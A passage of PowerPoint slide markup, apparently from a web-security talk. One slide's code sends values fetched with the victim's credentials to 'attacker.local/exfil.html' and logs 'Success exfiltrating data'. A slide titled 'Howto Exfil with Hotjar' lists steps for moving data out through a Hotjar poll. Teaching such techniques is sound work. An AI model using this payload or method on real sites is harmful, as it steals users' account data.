                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'https://attacker.local/exfil.html?sq='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'&amp;sa='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>""</a:t>
            </a:r>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9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>method:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'GET'</a:t>
            </a:r>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9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>headers:</a:t>
            </a:r>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CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Content-Type'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'credentials'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'include'</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;</a:t>
            </a:r>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9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Success exfiltrating data.'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>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DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;</a:t>
            </a:r>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err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Error on GET:'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      })   </a:t>
            </a:r>
          </a:p>
          <a:p>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>err</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// There was an error</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>warn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Something went wrong on GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>profile.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>err</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{391565FF-8487-BB56-BFD9-76CD4F37D6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4948518" y="2330824"/>
            <a:ext cx="6526306" cy="3048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80AC15C-FFBF-0B45-D200-F99261586181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4948518" y="1688123"/>
            <a:ext cx="5364859" cy="50116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08536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F7FFBD-9C70-36B8-585D-E1D643030297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="315047" y="2129000"/>
            <a:ext cx="11561905" cy="2600000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322771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951BEFF-4FFE-C07E-328F-D8B426FF8ACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Howto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Exfil with Hotjar</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B62E7CC-7B76-B4A3-2081-CED04FC2A094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165712" y="2807208"/>
            <a:ext cx="4599720" cy="3549630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" indent="-514350" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Open an account in hotjar.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-514350" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create a poll to insert in your site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-514350" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sniff traffic with proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-514350" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
